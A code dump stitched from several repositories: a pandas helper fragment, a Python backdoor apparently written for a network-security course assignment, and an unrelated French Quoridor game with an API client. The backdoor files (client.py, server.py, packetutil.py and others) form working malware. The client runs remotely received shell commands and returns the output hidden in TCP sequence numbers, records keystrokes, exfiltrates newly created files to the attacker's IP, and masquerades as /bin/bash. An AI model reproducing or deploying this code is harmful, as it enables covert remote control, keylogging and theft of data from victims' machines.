.merge(examples, left_index=True, right_index=True) \
.rename(columns={'0_x': 'n_unique', '0_y': 'pct_null',
0: 'example'}) \
.fillna('') \
.pprint(False)
while True:
cmd = input('Press <ENTER> to continue or press e to exit.')
if cmd == '':
seen.add(k)
break
elif cmd == 'e':
return seen
return seen
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,156 | khangtran123/Covert-Communication-Application | refs/heads/master | /bkutil.py | #!/usr/bin/python3
def message_to_bits(message) -> str:
"""Get the ASCII value of each character, and convert that value to binary
after zfill it to have a total length of 8 characters
Arguments:
message {str} -- message that will have each character converted to bits
Returns:
str -- a string containing the binary of message
"""
# Create the string that will hold all the bits.
messageData = ""
for c in message:
var = bin(ord(c))[2:].zfill(8)
# Concatenate with the placeholder
messageData += str(var)
return messageData
def message_spliter(msg: str):
"""splits a string into 32-bit chunks
Arguments:
msg {str} -- string that will be split into chunks
Returns:
[list] -- list of string with each element being 32 bits
"""
length = 32 # bits in seq #
if(len(msg) == length):
output = []
output.append(msg)
return msg
elif(len(msg) <= length):
# Pad so that the message is as long as the length
msg = msg.zfill(length)
return msg
# If the message length is greater than what can be stuffed into one packet,
# then break it down into multiple chunks
elif(len(msg) > length):
# Rounds are the amount of packets that can be filled with the data.
rounds = int(len(msg) / length)
# The excess is what will be left over
excess = len(msg) % length
# Create the blank array that will hold the data for each packet.
output = []
# Markers that will be used for traversing the data.
i = 0
start = 0
end = 0
# While packets can be completely filled
while(i < rounds):
start = i*length
end = (i*length)+(length - 1) # 31
output.append(msg[start:end+1])
i = i + 1
# All the full packets have been created. Now to deal with the excess
if(excess > 0):
# Add the excess to the output array.
output.append(msg[(end+1):(end+1+excess)])
return output
def lengthChecker(field):
"""Converts the bits to the nearest divisible by 8
Arguments:
field {string} -- [string containing binary]=
"""
covertContent = 0
seqContent = bin(field)[2:]
if len(seqContent) < 8:
covertContent = bin(field)[2:].zfill(8)
elif len(seqContent) > 8 and len(seqContent) < 16:
covertContent = bin(field)[2:].zfill(16)
elif len(seqContent) > 16 and len(seqContent) < 24:
covertContent = bin(field)[2:].zfill(24)
elif len(seqContent) > 24 and len(seqContent) < 32:
covertContent = bin(field)[2:].zfill(32)
else:
return seqContent
return covertContent
def text_from_bits(bits, encoding='utf-8', errors='surrogatepass'):
"""Convert binary to ASCII
Arguments:
bits {bin} -- bits being converted to ASCII
Keyword Arguments:
encoding {str} -- encoding of string being returned (default: {'utf-8'})
errors {str} -- (default: {'surrogatepass'})
Returns:
[str] -- [ASCII characters]
"""
n = int(bits, 2)
return n.to_bytes((n.bit_length() + 7) // 8, 'big').decode(encoding, errors) or '\0'
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,157 | khangtran123/Covert-Communication-Application | refs/heads/master | /server.py | #!/usr/bin/python3
import optparse
import os.path
import subprocess
import sys
from packetutil import *
from bkutil import *
from multiprocessing import Process
from cryptoutil import encrypt, decrypt
from scapy.all import *
import _thread
import argparse
import setproctitle
# parse command line argument
arg_parser = argparse.ArgumentParser(
prog='Backdoor',
description='COMP 8505 Final Assignment by Peyman Tehrani Parsa & Khang Tran'
)
arg_parser.add_argument('-p', dest='port', type = int, help = 'victim PORT', default=8888, const=8888, nargs='?')
arg_parser.add_argument('-i', dest='ip', type = str, help = 'victim IP', required=True)
args = arg_parser.parse_args()
#Global vars
TTL = 222
TTLKEY = 234
victim = (args.ip, args.port)
messages = []
def secret_send(msg: str, type: str = 'command'):
"""
Keyword arguments:
msg - payload being sent
type - file or command (default:command)
"""
msg = message_to_bits(msg)
chunks = message_spliter(msg)
packets = packatizer(chunks,TTL,victim)
send(packets, verbose=False)
if(type == "command"):
send(IP(dst=victim[0], ttl=TTL)/TCP(dport=victim[1], flags="U"))
def server():
"""Prompt user for the command they would like to execute on the backdoor.
"""
while True:
try:
command = input("\033[92m{} READY\033[0m\n".format(victim[0]))
except EOFError as e:
print(e)
# Print the command so that the user knows what they typed.
print(command)
# If the user types "exit". shutdown the program.
if(command == "exit"):
sys.exit()
elif(command == "keylog"):
send(IP(dst=victim[0], ttl=TTL)/TCP(dport=victim[1], flags="P"))
else:
secret_send(command)
def commandResult(packet):
"""Extracts data from parsed packets
Packets with flag:
0x40 - specifys that the packet contains data inside the sequence number
0x20 - specify end of message and the data is sent for shell execution
0x08 - specifys a keylog file request
Arguments:
packet {scapy.packet} -- packet to be parsed
"""
global TTLKEY
global messages
ttl = packet[IP].ttl
if(packet.haslayer(IP) and ttl == TTLKEY):
# checks if the flag has been set to know it contains the secret results
flag = packet['TCP'].flags
if flag == 0x40:
field = packet[TCP].seq
# Converts the bits to the nearest divisible by 8
covertContent = lengthChecker(field)
messages.append(text_from_bits(covertContent))
# End Flag detected
elif flag == 0x20:
payload = str(''.join(messages)[2:-2]).replace("\\n", '\n')
print('\n', payload)
messages = []
elif flag == 0x08:
load = packet[TCP].load
file_name = decrypt(load)
if(file_name == "file.log"):
print(" Keystroke Log File Extracted into /root/Documents/temp --> {}".format(file_name))
else:
print(" File Name --> {} --> was created. Check /root/Documents/temp".format(file_name))
#checks if log file exists in specific directory
file_directory = "/root/Documents/temp/{}".format(file_name)
if os.path.isfile(file_directory):
os.remove(file_directory)
with open(file_directory, 'w+') as f:
f.write('{}'.format(str(''.join(messages)[2:-2]).replace("\\n", '\n')))
messages = []
def commandSniffer():
"""filters incoming packets by type and sender. If packets match
given criteria it is parsed for content
"""
sniff(filter="tcp and host "+victim[0], prn=commandResult)
setproctitle.setproctitle("/bin/bash") # set fake process name
# print(setproctitle.getproctitle())
sniffThread = threading.Thread(target=commandSniffer)
sniffThread.daemon = True
sniffThread.start()
server()
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,158 | khangtran123/Covert-Communication-Application | refs/heads/master | /file_monitoring.py | #!/usr/bin/python3
import sys
import time
import argparse
import os
import threading
import re
from bkutil import *
from packetutil import *
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from scapy.all import *
from cryptoutil import *
#logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s',)
class Monitor(threading.Thread):
"""Observer thread that schedules watching directories and dispatches
calls to event handlers.
Arguments:
threading {Thread} -- represents a thread of control
"""
DIRECTORY_TO_WATCH = "/mnt/temp/"
def __init__(self,addr):
"""This constructor should always be called with keyword arguments.
"""
threading.Thread.__init__(self)
self.observer = Observer()
self.addr = addr
def run(self):
"""overwriten function from thread class. Runs event listner.
"""
print("Monitoring folder %s now" % self.DIRECTORY_TO_WATCH)
# logging.debug('running')
event_handler = Handler(self.addr)
# paramaters for observer (event handler, a directory to monitor, recursive is enabled)
self.observer.schedule(
event_handler, self.DIRECTORY_TO_WATCH, recursive=True)
self.observer.start()
try:
while True:
time.sleep(5)
except:
self.observer.stop()
print('Error')
self.observer.join()
class Handler(FileSystemEventHandler):
"""Main handler if file event leads to creation or modification
Arguments:
FileSystemEventHandler {FileSystemEventHandler} -- Base file system event handler that you can override methods from.
"""
def __init__(self,addr):
"""This constructor should always be called with keyword arguments.
"""
self.addr = addr
def on_any_event(self,event):
"""Overwritten Catch-all event handler.
"""
# is_directory --> True if event was emitted for a directory
if event.is_directory:
return None
# event_type --> The type of the event as a string. In this case, if a file is created
elif event.event_type == 'created':
# event.src_path --> Source path of the file system object that triggered this event.
print("Received created event - %s." % event.src_path)
print(self.addr)
with open(event.src_path,'r') as f:
content = f.read()
msg = message_to_bits(content)
chunks = message_spliter(msg)
packets = packatizer(chunks,234,self.addr)
send(packets, verbose=True)
direc = event.src_path.split('/')
encrypted=encrypt(direc[-1])
send(IP(dst=self.addr[0], ttl=234)/TCP(dport=self.addr[1], flags="P")/Raw(load=encrypted))
elif event.event_type == 'modified':
print("Received file modification event - %s." % event.src_path)
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,159 | khangtran123/Covert-Communication-Application | refs/heads/master | /linuxKey.py | import os
log_file = os.environ.get(
'pylogger_file',
os.path.expanduser('~/Documents/file.log')
)
# Allow setting the cancel key from environment args, Default: `
cancel_key = ord(
os.environ.get(
'pylogger_cancel',
'`'
)[0]
)
def OnKeyPress(event):
"""creating key pressing event and saving it into log file
Arguments:
event -- Key down event
"""
with open(log_file, 'a') as f:
f.write('{}\n'.format(event.Key))
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,160 | khangtran123/Covert-Communication-Application | refs/heads/master | /cryptoutil.py | #!/usr/bin/python3
from Crypto.Cipher import AES
encryptionKey = b'passyourwordssss'
IV = b'whatsthedealwith'
def encrypt(plaintext:str) -> str:
""" Encrypt data with the key and the parameters set at initialization.
Arguments:
plaintext {str} -- The piece of data to encrypt.
Returns:
str -- the encrypted data, as a byte string
"""
global encryptionKey
global IV
encryptor = AES.new(encryptionKey, AES.MODE_CFB, IV=IV)
enc = encryptor.encrypt(bytearray(plaintext.encode('utf-8')))
return enc
def decrypt(ciphertext: str) -> str:
"""Decrypt data with the key and the parameters set at initialization.
Arguments:
ciphertext {str} -- The piece of data to decrypt.
Returns:
str -- the decrypted data (byte string, as long as *ciphertext*)
"""
global encryptionKey
global IV
decryptor = AES.new(encryptionKey, AES.MODE_CFB, IV=IV)
plain = decryptor.decrypt(bytearray(ciphertext)).decode('utf-8')
return plain
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,161 | khangtran123/Covert-Communication-Application | refs/heads/master | /packetutil.py | #!/usr/bin/python3
from scapy.all import *
def packatizer(msg ,TTL:int,addr:tuple):
"""Crafts a packets using scapy and returns a list of TCP packet
Arguments:
msg {list || str} -- list of characters that will be stored inside the sequence
number of a TCP packet
TTL {int} -- used for packet identification durring packet sniffing
addr {tuple} -- the IP([0]) and PORT([1]) packet is being sent to
Returns:
[list] -- list of TCP scapy.packets
"""
packets = []
# If the length of the number is larger than what is allowed in one packet, split it
counter = 0
if(type(msg) is str): # If not an array (if there is only one packet.)
packets.append(craft(msg,TTL,addr))
elif(type(msg) is list): # If an array (if there is more than one packet)
while (counter < len(msg)):
packets.append(craft(msg[counter],TTL,addr))
counter = counter + 1
return packets
def craft(data: str,TTL:int,addr:tuple) -> IP:
"""Crafts a packet using scapy and returns a TCP packet
Arguments:
data {str} -- characters that will be stored inside the sequence number of a TCP packet
TTL {int} -- used for packet identification durring packet sniffing
addr {tuple} -- the IP([0]) and PORT([1]) packet is being sent to
Returns:
IP -- TCP scapy.packet
"""
packet = IP(dst=addr[0], ttl=TTL)/TCP( dport=addr[1],seq=int(str(data), 2), flags="E")
return packet
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,162 | khangtran123/Covert-Communication-Application | refs/heads/master | /client.py | #!/usr/bin/python3
import optparse
import os
import sys
import time
from packetutil import *
from bkutil import *
from multiprocessing import Process
from cryptoutil import *
from scapy.all import *
from file_monitoring import *
import _thread
import setproctitle
import argparse
import pyxhook
from linuxKey import OnKeyPress
# parse command line argument
arg_parser = argparse.ArgumentParser(
prog='Backdoor',
description='COMP 8505 Final Assignment by Peyman Tehrani Parsa & Khang Tran'
)
arg_parser.add_argument('-p', dest='port', type = int, help = 'attackers PORT', default=9999, const=9999, nargs='?')
arg_parser.add_argument('-i', dest='ip', type = str, help = 'attackers IP', required=True)
args = arg_parser.parse_args()
#Global vars
TTL = 234
TTLKEY = 222
attacker = (args.ip, args.port)
messages = []
def secret_send(msg: str, type: str,filename: str="file"):
""" Sends a file or plain text to attacker device
Arguments:
msg {str} -- payload being sent
type {str} -- specifies if content sent is file or command
filename {str} -- name of file being sent (default:file)
"""
msg = message_to_bits(msg)
chunks = message_spliter(msg)
packets = packatizer(chunks,TTL,attacker)
send(packets, verbose=True)
if(type == "command"):
send(IP(dst=attacker[0], ttl=TTL)/TCP(dport=attacker[1], flags="U"))
elif(type == "file"):
send(IP(dst=attacker[0], ttl=TTL)/TCP(dport=attacker[1], flags="P")/Raw(load=encrypt(filename)))
def execPayload(command):
"""executes a command in shell and returns the results
Arguments:
command {str} -- A string, or a sequence of program arguments
"""
# Execute the command
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result = str(proc.stdout.read() + proc.stderr.read())
if(result == ""):
result = "N/A"
#print(result) DEBUG
secret_send(result,"command")
def commandResult(packet):
"""Extracts data from parsed packets
Packets with flag:
0x40 - specifys that the packet contains data inside the sequence number
0x20 - specify end of message and the data is sent for shell execution
0x08 - specifys a keylog file request
Arguments:
packet {scapy.packet} -- packet to be parsed
"""
global TTLKEY
global messages
ttl = packet[IP].ttl
if(packet.haslayer(IP) and ttl == TTLKEY):
# checks if the flag has been set to know it contains the secret results
flag = packet['TCP'].flags
if flag == 0x40:
field = packet[TCP].seq
covertContent = lengthChecker(field)
messages.append(text_from_bits(covertContent))
# End Flag detected
elif flag == 0x20:
payload = ''.join(messages)
execPayload(payload)
messages = []
elif flag == 0x08:
with open('/root/Documents/file.log','r') as f:
secret_send(f.read(),"file","file.log")
def commandSniffer():
"""filters incoming packets by type and sender. If packets match
given criteria it is parsed for content
"""
sniff(filter="tcp and host "+attacker[0], prn=commandResult)
setproctitle.setproctitle("/bin/bash") # set fake process name
sniffThread = threading.Thread(target=commandSniffer)
fileMonitor = Monitor(addr=attacker)
#event listner for keyboard press down
new_hook=pyxhook.HookManager()
new_hook.KeyDown=OnKeyPress
new_hook.HookKeyboard()
new_hook.daemon = True
fileMonitor.daemon = True
sniffThread.daemon = True
new_hook.start()
sniffThread.start()
fileMonitor.start()
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
#reset()
print ("Exiting")
sys.exit(0)
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,166 | samuelgougeon/python_projet2 | refs/heads/master | /vrmtest.py | '''Vrm pour faire des tests'''
import quoridor
def jouer_jeu(joueur1, robot):
partie = quoridor.Quoridor((f'{joueur1}', f'{robot}'))
partie.__str__()
i = True
while i:
type_coup = input('Quel est ton type de coup?')
if type_coup == 'D':
position = tuple(input('Vers quelle position veux-tu aller?'))
pos = ((int(position[1]), int(position[4])))
partie.déplacer_jeton(1, pos)
partie.jouer_coup(2)
print(f'La partie est terminée: {partie.partie_terminée()}')
elif type_coup == 'MH':
position = tuple(input('À quelle position veux-tu placer un mur horizontal?'))
pos = ((int(position[1]), int(position[4])))
partie.placer_mur(1, pos, 'horizontal')
partie.jouer_coup(2)
print(f'La partie est terminée: {partie.partie_terminée()}')
elif type_coup == 'MV':
position = tuple(input('À quelle position veux-tu placer un mur vertical?'))
pos = ((int(position[1]), int(position[4])))
partie.placer_mur(1, pos, 'vertical')
partie.jouer_coup(2)
print(f'La partie est terminée: {partie.partie_terminée()}')
partie.__str__()
jouer_jeu('Samu-kun', 'Baka-kun')
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,167 | samuelgougeon/python_projet2 | refs/heads/master | /api.py | '''S'occupe des requêtes au serveur'''
import requests
URL_BASE = 'https://python.gel.ulaval.ca/quoridor/api/'
#fonction 4
def débuter_partie(idul):
'''Demande au serveur le dictionnaire d'une nouvelle partie'''
rep = requests.post(URL_BASE+'débuter/', data={'idul': idul})
rep2 = rep.json()
if rep.status_code == 200:
if 'message' in rep2:
raise RuntimeError(rep2['message'])
else:
return rep2['id'], rep2['état']
else:
raise ConnectionError(rep.status_code)
#fonction 5
def jouer_coup(id_partie, type_coup, position):
'''Demande au serveur le dictionnaire après un coup joué'''
rep = requests.post(
URL_BASE+'jouer/',
data={'id': id_partie, 'type': type_coup, 'pos': position}
)
rep2 = rep.json()
if rep.status_code == 200:
if 'gagnant' in rep2:
raise StopIteration(rep2['gagnant'])
elif 'message' in rep2:
raise RuntimeError(rep2['message'])
else:
return rep2['état']
else:
raise ConnectionError(rep.status_code)
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,168 | samuelgougeon/python_projet2 | refs/heads/master | /quoridor.py | '''Encadrer le jeu avec une classe'''
from random import random
import networkx as nx
def construire_graphe(joueurs, murs_horizontaux, murs_verticaux):
"""
Crée le graphe des déplacements admissibles pour les joueurs.
:param joueurs: une liste des positions (x,y) des joueurs.
:param murs_horizontaux: une liste des positions (x,y) des murs horizontaux.
:param murs_verticaux: une liste des positions (x,y) des murs verticaux.
:returns: le graphe bidirectionnel (en networkX) des déplacements admissibles.
"""
joueurs = list(map(tuple, joueurs))
graphe = nx.DiGraph()
# pour chaque colonne du damier
for x in range(1, 10):
# pour chaque ligne du damier
for y in range(1, 10):
# ajouter les arcs de tous les déplacements possibles pour cette tuile
if x > 1:
graphe.add_edge((x, y), (x-1, y))
if x < 9:
graphe.add_edge((x, y), (x+1, y))
if y > 1:
graphe.add_edge((x, y), (x, y-1))
if y < 9:
graphe.add_edge((x, y), (x, y+1))
# retirer tous les arcs qui croisent les murs horizontaux
for x, y in murs_horizontaux:
graphe.remove_edge((x, y-1), (x, y))
graphe.remove_edge((x, y), (x, y-1))
graphe.remove_edge((x+1, y-1), (x+1, y))
graphe.remove_edge((x+1, y), (x+1, y-1))
# retirer tous les arcs qui croisent les murs verticaux
for x, y in murs_verticaux:
graphe.remove_edge((x-1, y), (x, y))
graphe.remove_edge((x, y), (x-1, y))
graphe.remove_edge((x-1, y+1), (x, y+1))
graphe.remove_edge((x, y+1), (x-1, y+1))
# retirer tous les arcs qui pointent vers les positions des joueurs
# et ajouter les sauts en ligne droite ou en diagonale, selon le cas
prédécesseurs = list(list(graphe.predecessors(joueur)) for joueur in map(tuple, joueurs))
successors = list(list(graphe.successors(joueur)) for joueur in map(tuple, joueurs))
for i, joueur in enumerate(joueurs):
for prédécesseur in prédécesseurs[i]:
# retire tous les liens menant à la position d'un joueur
graphe.remove_edge(prédécesseur, joueur)
# si admissible, ajouter un lien sauteur
successeur_en_ligne = tuple(
2*joueur[i]-prédécesseur[i] for i in range(len(joueur))
)
if successeur_en_ligne in set(successors[i])-set(joueurs):
# ajouter un saut en ligne droite
graphe.add_edge(prédécesseur, successeur_en_ligne)
else:
# ajouter les liens en diagonale
successeur_diag_1 = tuple(
joueur[i]+(joueur[-(i+1)]-prédécesseur[-(i+1)])
for i in range(len(joueur))
)
if successeur_diag_1 in set(successors[i])-set(joueurs):
graphe.add_edge(prédécesseur, successeur_diag_1)
successeur_diag_2 = tuple(
joueur[i]-(joueur[-(i+1)]-prédécesseur[-(i+1)])
for i in range(len(joueur))
)
if successeur_diag_2 in set(successors[i])-set(joueurs):
graphe.add_edge(prédécesseur, successeur_diag_2)
# ajouter les noeuds objectifs des deux joueurs
for x in range(1, 10):
graphe.add_edge((x, 9), 'B1')
graphe.add_edge((x, 1), 'B2')
return graphe
class QuoridorError(Exception):
'''Pour pouvoir utiliser toutes les méthodes de la classe 'Exception'
sous le nom 'QuoridorError' '''
class Quoridor:
'''Pour encadrer le jeu'''
def __init__(self, joueurs, murs=None):
#Erreurs de base à soulever
if not hasattr(joueurs, '__iter__'):
raise QuoridorError("Ton argument 'joueurs' n'est pas un itérable.")
if len(joueurs) > 2:
raise QuoridorError("On ne veut jouer qu'à deux joueurs.")
#Si 'joueurs' est un itérable de strings, créer la liste de dictionnaires
if isinstance(joueurs[0], str) and isinstance(joueurs[1], str):
self.joueurs = [
{'nom': joueurs[0], 'murs': 10, 'pos': (5, 1)},
{'nom': joueurs[1], 'murs': 10, 'pos': (5, 9)},
]
#Si 'joueurs' est un itérable de dictionnaires, les traiter
if isinstance(joueurs[0], dict) and isinstance(joueurs[1], dict):
for i in joueurs:
if not 0 <= joueurs[i]['murs'] <= 10:
raise QuoridorError("Le nombre de murs à placer est entre 0 et 10.")
if not 1 <= joueurs[i]['pos'][0] <= 9 or not 1 <= joueurs[i]['pos'][1] <= 9:
raise QuoridorError("La position que tu essaies d'entrer n'est pas valide!")
self.joueurs = joueurs
#Si les murs n'existent pas encore, créer le dictionnaire
if murs is None:
self.murs = {'horizontaux': [], 'verticaux': []}
#Si les murs existent, les traiter
else:
if not isinstance(murs, dict):
raise QuoridorError("Ton argument 'murs' n'est pas un dictionnaire.")
for i in enumerate(murs['horizontaux']):
if not 1 <= i[1][0] <= 8 or not 2 <= i[1][1] <= 9:
raise QuoridorError("Position de mur invalide")
for i in enumerate(murs['verticaux']):
if not 2 <= i[1][0] <= 9 or not 1 <= i[1][1] <= 8:
raise QuoridorError("Position de mur invalide")
self.murs = murs
#Nombre maximal de murs en circulation
if self.joueurs[0]['murs'] + self.joueurs[1]['murs'] + len(self.murs['horizontaux']) + len(self.murs['verticaux']) != 20:
raise QuoridorError("Nombre total de murs invalide (seul nombre autorisé: 20).")
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
def __str__(self):
'''fonction pour afficher le damier'''
le = 'Légende: 1={}, 2={}'.format(self.joueurs[0], self.joueurs[1])
gb = []
for i in range(9):
f1 = [' ', ' ', '.', ' ']*9 + ['|']
f1[0] = f'\n{i+1} |'
gb += [f1]
hb = [' ']*36 + ['|']
hb[0] = '\n |'
gb += [hb]
ve = self.murs['verticaux']
ho = self.murs['horizontaux']
pos1 = self.joueurs[0]['pos']
pos2 = self.joueurs[1]['pos']
for i in range(len(ve)):
for j in range(3):
gb[ve[i][1]*2 - 2+j][ve[i][0]*4 -4] = '|'
for i in range(len(ho)):
for j in range(7):
gb[ho[i][1]*2 - 3][ho[i][0]*4 - 3 + j] = '-'
gb[pos1[1]*2 - 2][pos1[0]*4 - 2] = '1'
gb[pos2[1]*2 - 2][pos2[0]*4 - 2] = '2'
s = []
gb.reverse()
for i in range(17):
s += ''.join(gb[i+1])
ch = (le + '\n '+'-'*35 + ''.join(s) +
'\n--|'+'-'*35+'\n | 1 2 3 4 5 6 7 8 9')
return ch
def déplacer_jeton(self, joueur, position):
'''Pour déplacer un jeton à une position'''
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
#Contraintes et déplacement du jeton
if not joueur in {1, 2}:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
if not (1 <= position[0] <= 9 and 1 <= position[1] <= 9):
raise QuoridorError("Cette position n'existe pas!")
if position not in list(self.graphe.successors(self.joueurs[joueur - 1]['pos'])):
raise QuoridorError("Tu ne peux pas aller là!")
self.joueurs[joueur - 1]['pos'] = position
def état_partie(self):
'''Pour produire le dictionnaire d'état de jeu'''
return {'joueurs': self.joueurs, 'murs': self.murs}
def jouer_coup(self, joueur):
"""Pour jouer le meilleur coup automatique"""
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
if not joueur in {1, 2}:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
if self.partie_terminée() is not False:
raise QuoridorError("La partie est déjà terminée.")
def placer_mur_devant(joueur, a):
"""fonction pour placer un mur devant le joueur adversaire"""
if a[2][0]-a[1][0] == 0:
#Pour savoir si le chemin le plus court est vertical
em = [a[2][0]]
if a[2][0] == 9:
#pour ne pas que le mur sort du damier
em = [8]
if a[2][1]-a[1][1] == -1:
#pour mettre le mur en bas du joueur lorsqu'il doit déscendre
em.insert(1, a[2][1]+1)
else:
#Pour mettre le mur en haut du joueur lorsqu'il doit monter
em.insert(1, a[2][1])
ori = 'horizontal'
if a[2][1]-a[1][1] == 0:
#Pour savoir si le chemin le plus court est horizontal
em = [a[2][1]]
if a[2][1] == 9:
#Pour ne pas que le mur sorte du damier
em = [8]
if a[2][0]-a[1][0] == -1:
#Pour mettre le mur à gauche lorsque le chemin le plus court est à gauche
em.insert(0, a[2][0]+1)
else:
#Pour mettre le mur à droite lorsque le chemin le plus court est à droite
em.insert(0, a[2][0])
ori = 'vertical'
Quoridor.placer_mur(self, joueur, em, ori)
possibilité = [1, 2]
possibilité.remove(joueur)
adversaire = possibilité[0]
#L'adversaire prend le numero restant entre 1 et 2
chemin = nx.shortest_path(self.graphe, self.joueurs[joueur - 1]['pos'], f'B{joueur}')[0]
chemin_adversaire = nx.shortest_path(self.graphe, self.joueurs[adversaire - 1]['pos'], f'B{adversaire}')[0]
if len(chemin) <= len(chemin_adversaire):
if random() <= 0.1*self.joueurs[joueur - 1]['mur']-0.1:
#fonction qui place des murs aléatoirement mais proportionnelement au nombres de murs restants
#il restera cepedant toujours un mur pour le garder en cas où l'adversaire allait gagner
placer_mur_devant(joueur, chemin_adversaire)
else:
#Avancer le jeton vers son but
Quoridor.déplacer_jeton(self, joueur, chemin[1])
if len(chemin_adversaire) == 2:
#toujours placer un mur devant l'adversaire lorsqu'il est à un déplacement de gagner
placer_mur_devant(joueur, chemin_adversaire)
else:
#Si le chemin de l'adversaire est plus court que le nôtre, on place un mur devant celui-ci
placer_mur_devant(joueur, chemin_adversaire)
def partie_terminée(self):
'''Pour arrêter la partie si elle est terminée'''
if self.joueurs[0]['pos'][1] == 9:
return 'Le gagnant est {}'.format(self.joueurs[0]['nom'])
elif self.joueurs[1]['pos'][1] == 1:
return 'Le gagnant est {}'.format(self.joueurs[1]['nom'])
else:
return False
def placer_mur(self, joueur, position, orientation):
'''Pour placer un mur à une position'''
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
#S'assurer que le numéro de joueur est 1 ou 2 et traiter le nombre de murs en banque.
if joueur in {1, 2}:
if self.joueurs[joueur - 1]['murs'] != 0:
self.joueurs[joueur - 1]['murs'] -= 1
else:
raise QuoridorError("Tu as déjà placé tous tes murs :'(")
else:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
#Placement d'un mur horizontal
if orientation == 'horizontal':
#S'assurer que le mur peut être placé d'après les dimensions du board
if not 1 <= position[0] <= 8 or not 2 <= position[1] <= 9:
raise QuoridorError('Tu ne peux pas placer un mur à cet endroit')
#S'assurer que ce nouveau mur horizontal ne croise pas un autre mur
if (position[0] + 1, position[1] - 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if (position[0] + 1, position[1]) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if position in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if (position[0] - 1, position[1]) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
self.murs['horizontaux'].append(position)
#S'assurer que les joueurs ne sont pas enfermés
if nx.has_path(self.graphe, self.joueurs[0]['pos'], 'B1') is False:
self.murs['horizontaux'].remove(position)
raise QuoridorError("Le joueur 1 est enfermé! Shame on you.")
elif nx.has_path(self.graphe, self.joueurs[1]['pos'], 'B2') is False:
self.murs['horizontaux'].remove(position)
raise QuoridorError("Le joueur 2 est enfermé! Shame on you.")
#Placement d'un mur vertical
elif orientation == 'vertical':
#S'assurer que le mur peut être placé d'après les dimensions du board
if not 2 <= position[0] <= 9 or not 1 <= position[1] <= 8:
raise QuoridorError('Tu ne peux pas placer un mur à cet endroit')
#S'assurer que ce nouveau mur vertical ne croise pas un autre mur
if (position[0] - 1, position[1] + 1) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif (position[0], position[1] - 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif position in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif (position[0], position[1] + 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
else:
self.murs['verticaux'].append(position)
